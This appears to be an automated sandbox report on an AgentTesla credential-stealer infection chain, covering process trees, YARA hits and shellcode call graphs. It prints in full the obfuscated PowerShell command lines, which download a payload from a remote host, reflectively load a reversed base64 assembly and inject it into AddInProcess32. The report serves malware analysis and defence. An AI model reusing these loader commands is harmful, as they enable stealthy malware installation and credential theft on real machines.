                                          2024-10-24 06:59:12 UTC1378INData Raw: 70 0e 51 21 52 69 af da f1 39 f6 b2 96 08 c5 98 50 be d8 58 85 a9 12 bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d
                                          Data Ascii: pQ!Ri9PX1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/
                                          2024-10-24 06:59:12 UTC1378INData Raw: 8b 1a 88 d4 12 59 54 13 5b be 27 af c8 e2 ad b4 01 4a 40 bc d0 d5 13 ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c
                                          Data Ascii: YT['J@v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,
                                          2024-10-24 06:59:12 UTC1378INData Raw: e6 f0 1a af 0a 7d 3c 28 c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb
                                          Data Ascii: }<(Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#
                                          2024-10-24 06:59:12 UTC1378INData Raw: cc cb ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65
                                          Data Ascii: txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De
                                          2024-10-24 06:59:12 UTC1378INData Raw: 11 c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91
                                          Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-T


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:02:58:13
                                          Start date:24/10/2024
                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                          Imagebase:0x13f6b0000
                                          File size:28'253'536 bytes
                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:2
                                          Start time:02:59:02
                                          Start date:24/10/2024
                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                          Imagebase:0x400000
                                          File size:543'304 bytes
                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:02:59:05
                                          Start date:24/10/2024
                                          Path:C:\Windows\SysWOW64\wscript.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs"
                                          Imagebase:0xd40000
                                          File size:141'824 bytes
                                          MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:02:59:05
                                          Start date:24/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                          Imagebase:0x9b0000
                                          File size:427'008 bytes
                                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:02:59:06
                                          Start date:24/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39) | & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')"
                                          Imagebase:0x9b0000
                                          File size:427'008 bytes
                                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.525088434.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.525088434.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:02:59:27
                                          Start date:24/10/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                          Imagebase:0xbe0000
                                          File size:42'056 bytes
                                          MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.628239471.00000000023C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:false

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:16.1%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:53.7%
                                            Total number of Nodes:54
                                            Total number of Limit Nodes:5
                                            execution_graph 298 35603db 299 35603dd 298->299 306 35603f0 LoadLibraryW 299->306 301 35603e2 302 356040a 8 API calls 301->302 303 35603f7 302->303 304 356047f 8 API calls 303->304 305 356041b 303->305 304->305 307 35603f7 306->307 311 356040a 306->311 310 356041b 307->310 315 356047f URLDownloadToFileW 307->315 312 356040d 311->312 313 356047f 8 API calls 312->313 314 356041b 312->314 313->314 325 3560498 315->325 318 356049f 320 35604a7 ShellExecuteW 318->320 323 356050c 318->323 334 35604d2 320->334 322 35604c6 322->323 324 35604d5 ExitProcess 322->324 323->310 326 356049a 325->326 327 35604ad 3 API calls 326->327 328 356049f 327->328 329 35604a7 ShellExecuteW 328->329 331 3560488 328->331 330 35604d2 ExitProcess 329->330 332 35604c6 330->332 331->318 336 35604ad 331->336 332->331 333 35604d5 ExitProcess 332->333 335 35604d5 ExitProcess 334->335 337 35604b0 ShellExecuteW 336->337 338 35604d2 ExitProcess 337->338 340 35604c6 337->340 338->340 339 356050d 339->318 340->339 341 35604d5 ExitProcess 340->341 342 35604d9 GetPEB 343 35604e7 342->343 344 3560329 ExitProcess 355 3560342 344->355 356 3560348 355->356 365 356035e 356->365 366 3560364 365->366 375 3560385 366->375 376 3560388 375->376 383 35603db 376->383 384 35603dd 383->384 385 35603f0 9 API calls 384->385 386 35603e2 385->386 387 356040a 8 API calls 386->387 388 35603f7 387->388 389 356047f 8 API calls 388->389 390 356041b 388->390 389->390

                                            Callgraph

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 356047f-3560499 URLDownloadToFileW call 3560498 4 356049f-35604a5 0->4 5 356049a call 35604ad 0->5 6 35604a7-35604c9 ShellExecuteW call 35604d2 4->6 7 356050c-3560518 4->7 5->4 9 356051b 6->9 20 35604cb 6->20 7->9 11 3560523-3560527 9->11 12 356051d-3560521 9->12 14 356053c-356053e 11->14 15 3560529-356052d 11->15 12->11 13 356052f-3560536 12->13 17 356053a 13->17 18 3560538 13->18 19 356054e-356054f 14->19 15->13 15->14 17->14 22 3560540-3560549 17->22 18->14 20->14 21 35604cd-35604d7 ExitProcess 20->21 25 3560512-3560515 22->25 26 356054b 22->26 25->22 28 3560517 25->28 26->19 28->9
                                            APIs
                                            • URLDownloadToFileW.URLMON(00000000,0356041B,?,00000000,00000000), ref: 03560481
                                              • Part of subcall function 03560498: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035604BF
                                              • Part of subcall function 03560498: ExitProcess.KERNEL32(00000000), ref: 035604D7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.472683807.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                            Similarity
                                            • API ID: DownloadExecuteExitFileProcessShell
                                            • String ID:
                                            • API String ID: 3584569557-0
                                            • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                            • Instruction ID: 65173ce798605d7edf1ef3fcaa3ae623067134ee029c1d3f0c0f7bf763ea3ee3
                                            • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                            • Instruction Fuzzy Hash: A0F0E2A064C3802AFA21E374BC5AF5A6E28BFA1702F554889B1535F0F3E9808800C729

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 29 35604ad-35604bf ShellExecuteW 31 35604c6-35604c9 29->31 32 35604c1 call 35604d2 29->32 34 356051b 31->34 35 35604cb 31->35 32->31 38 3560523-3560527 34->38 39 356051d-3560521 34->39 36 356053c-356053e 35->36 37 35604cd-35604d7 ExitProcess 35->37 42 356054e-356054f 36->42 38->36 41 3560529-356052d 38->41 39->38 40 356052f-3560536 39->40 44 356053a 40->44 45 3560538 40->45 41->36 41->40 44->36 47 3560540-3560549 44->47 45->36 49 3560512-3560515 47->49 50 356054b 47->50 49->47 51 3560517 49->51 50->42 51->34
                                            APIs
                                            • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035604BF
                                              • Part of subcall function 035604D2: ExitProcess.KERNEL32(00000000), ref: 035604D7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.472683807.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                            Similarity
                                            • API ID: ExecuteExitProcessShell
                                            • String ID:
                                            • API String ID: 1124553745-0
                                            • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                            • Instruction ID: 03fa65b747b144ed716de8f7833380a64f45e31a1adea81fb57cd322c3e5ae6c
                                            • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                            • Instruction Fuzzy Hash: A70126E4A4C39221DB74F228F836BEAAB55BBB1700FCC8C46A882070F5E55494C3CB59

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 52 3560498-35604a5 call 35604ad 56 35604a7-35604c9 ShellExecuteW call 35604d2 52->56 57 356050c-3560518 52->57 59 356051b 56->59 70 35604cb 56->70 57->59 61 3560523-3560527 59->61 62 356051d-3560521 59->62 64 356053c-356053e 61->64 65 3560529-356052d 61->65 62->61 63 356052f-3560536 62->63 67 356053a 63->67 68 3560538 63->68 69 356054e-356054f 64->69 65->63 65->64 67->64 72 3560540-3560549 67->72 68->64 70->64 71 35604cd-35604d7 ExitProcess 70->71 75 3560512-3560515 72->75 76 356054b 72->76 75->72 78 3560517 75->78 76->69 78->59
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.472683807.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                            Similarity
                                            • API ID: ExecuteExitProcessShell
                                            • String ID:
                                            • API String ID: 1124553745-0
                                            • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                            • Instruction ID: f95c2207c0be3a83675ec27a4f0fb3765c3a8d20cd532e5612380e150750d1c6
                                            • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                            • Instruction Fuzzy Hash: CC0149E0A4C34621E774E224FC69BA9AE85BBB1704F98885AF4920B0F5E7844843C71D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 79 35603f0 LoadLibraryW 80 35603f7-35603fc 79->80 81 35603f2 call 356040a 79->81 82 35603fe-356046b call 356047f 80->82 83 356046c-356047d 80->83 81->80 82->83
                                            APIs
                                            • LoadLibraryW.KERNEL32(035603E2), ref: 035603F0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.472683807.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: d3ab71366fc078d12fd803f0fe5b75a5ccdd2bfd2dcf227f54128e7e6e1f1fe3
                                            • Instruction ID: 3cf850d272d7695f69e290d0f70222c0cc942f8a13157ffda2e265f42646f827
                                            • Opcode Fuzzy Hash: d3ab71366fc078d12fd803f0fe5b75a5ccdd2bfd2dcf227f54128e7e6e1f1fe3
                                            • Instruction Fuzzy Hash: 2111139280E7C21FCB2783701D7AA65BF742E2310576D89CFD0C20B8E3E6889186C797

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 90 35604d2-35604d7 ExitProcess
                                            APIs
                                            • ExitProcess.KERNEL32(00000000), ref: 035604D7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.472683807.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                            • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                            • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                            • Instruction Fuzzy Hash:

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 127 35604d9-35604e4 GetPEB 128 35604e7-35604f8 call 3560501 127->128 131 35604fa-35604fe 128->131
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.472683807.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                            • Instruction ID: d9f098d329dd2f63d0015820fda38e6ee43ea1a8f3e9e7fa0f757f5a5c82d4dd
                                            • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                            • Instruction Fuzzy Hash: 10D05271206502CFC314DB04D990E1BF37AFFD8225B28C268E0024BB6AC330EC92CA94

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 132 3560329-3560348 ExitProcess call 3560342 135 356034f-3560350 132->135 136 356034a call 356035e 132->136 137 35603a3-35603cf 135->137 138 3560353-356035b 135->138 136->135 144 35603d0 137->144 146 35603d1-35603d9 137->146 138->144 145 356035d-356036c 138->145 144->146 148 35603de-35603e4 145->148 149 356036e-3560373 145->149 146->148 152 35603e6-35603ee 148->152 149->148 151 3560375 149->151 151->152 154 3560377-356037b 151->154 155 35603f1-35603fc call 356040a 152->155 154->144 156 356037d 154->156 160 35603fe-356046b call 356047f 155->160 161 356046c-356047d 155->161 156->155 158 356037f-35603a0 call 35603db 156->158 158->137 160->161
                                            APIs
                                            • ExitProcess.KERNEL32(03560317), ref: 03560329
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.472683807.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: a70d04497ce49d76cc33172d830df23bf5400cfba90bfd5012ff64398446be3d
                                            • Instruction ID: 2e0701212cf23a4bbf4a76a56cbd42c339c2a6abcd03a5728a97aefc47684f24
                                            • Opcode Fuzzy Hash: a70d04497ce49d76cc33172d830df23bf5400cfba90bfd5012ff64398446be3d
                                            • Instruction Fuzzy Hash: 31110F69A0D3C04FD316D2707AAA154FF21BA9341271C86CF81858F0F3E295A147D383
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.569344168.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
